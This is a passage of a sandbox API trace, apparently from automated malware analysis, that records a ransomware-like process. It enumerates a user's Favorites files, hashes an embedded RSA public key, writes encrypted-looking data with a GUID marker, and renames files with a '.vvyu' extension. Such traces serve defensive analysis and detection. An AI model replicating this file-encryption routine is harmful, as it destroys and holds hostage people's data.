[0189.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0189.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0189.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44728 [0189.189] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0189.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0189.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.189] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0189.190] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3bb48 | out: hHeap=0x6a0000) returned 1 [0189.190] GetCurrentThreadId () returned 0x264 [0189.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0189.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d43940 [0189.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84be0 [0189.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea700 [0189.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0189.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0189.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x6d5c88 [0189.190] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.191] GetCurrentThreadId () returned 0x264 [0189.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x2be2220 [0189.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.191] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.191] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0189.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0189.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0189.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82b10 [0189.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0189.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0189.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39988 [0189.192] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0189.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0189.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0189.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0189.192] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39928 [0189.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37890 [0189.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378f0 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39940 [0189.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c446e8 [0189.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378f0 | out: hHeap=0x6a0000) returned 1 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39910 [0189.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399a0 [0189.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0189.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39970 [0189.193] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0189.193] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39958 [0189.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d399b8 [0189.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39958 [0189.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39970 | out: hHeap=0x6a0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c378a0 [0189.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c446a8 [0189.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c) returned 0x2d27ce8 [0189.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39928 [0189.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0189.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39988 | out: hHeap=0x6a0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0189.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399b8 | out: hHeap=0x6a0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0189.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0189.194] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c31700 [0189.194] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378b0 | out: hHeap=0x6a0000) returned 1 [0189.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0189.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39928 | out: hHeap=0x6a0000) returned 1 [0189.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0189.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0189.195] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0189.195] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0189.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ea700 | out: hHeap=0x6a0000) returned 1 [0189.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0189.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0189.196] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0189.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0189.197] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0189.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0189.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378c0 | out: hHeap=0x6a0000) returned 1 [0189.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39958 | out: hHeap=0x6a0000) returned 1 [0189.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0189.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d399a0 | out: hHeap=0x6a0000) returned 1 [0189.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0189.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39940 | out: hHeap=0x6a0000) returned 1 [0189.198] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39910 | out: hHeap=0x6a0000) returned 1 [0189.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0189.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84be0 | out: hHeap=0x6a0000) returned 1 [0189.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0189.199] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d398f8 | out: hHeap=0x6a0000) returned 1 [0189.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d390a8 | out: hHeap=0x6a0000) returned 1 [0189.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0189.200] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0189.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82b10 | out: hHeap=0x6a0000) returned 1 [0189.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0189.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0189.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0189.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0189.201] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0189.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0189.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.202] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0189.202] WriteFile (in: hFile=0x584, lpBuffer=0x794008*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x794008*, lpNumberOfBytesWritten=0x30ffb14*=0x80, lpOverlapped=0x0) returned 1 [0189.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.203] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.203] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0189.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0189.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0189.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0189.204] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0189.204] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0189.204] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0189.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0189.205] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0189.205] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0189.205] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0189.205] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0189.205] CloseHandle (hObject=0x584) returned 1 [0189.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0189.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8a0) returned 0x2d45778 [0189.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x794008 | out: hHeap=0x6a0000) returned 1 [0189.207] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Home.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at home.url.vvyu")) returned 1 [0189.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d45778 | out: hHeap=0x6a0000) returned 1 [0189.208] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.209] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0189.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d9d0 | out: hHeap=0x6a0000) returned 1 [0189.212] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0189.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0189.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d9d0 [0189.212] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0189.212] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned=".url" [0189.212] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0189.213] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=133) returned 1 [0189.213] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0189.216] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0189.216] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0189.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.218] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0189.218] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x85, lpOverlapped=0x0) returned 1 [0189.218] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0189.218] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.218] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0189.218] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea700) returned 1 [0189.219] CryptCreateHash (in: hProv=0x6ea700, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0189.219] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0189.219] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0189.219] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0189.219] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0189.219] GetLastError () returned 0x0 [0189.219] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0189.219] CryptReleaseContext (hProv=0x6ea700, dwFlags=0x0) returned 1 [0189.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0189.220] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0189.220] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0189.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0189.220] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0189.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0189.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0189.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x794008 [0189.220] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0189.220] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0189.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0189.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84d30 [0189.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0189.220] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0189.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d390a8 [0189.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d398f8 [0189.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d390f0 [0189.221] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39910 [0189.221] 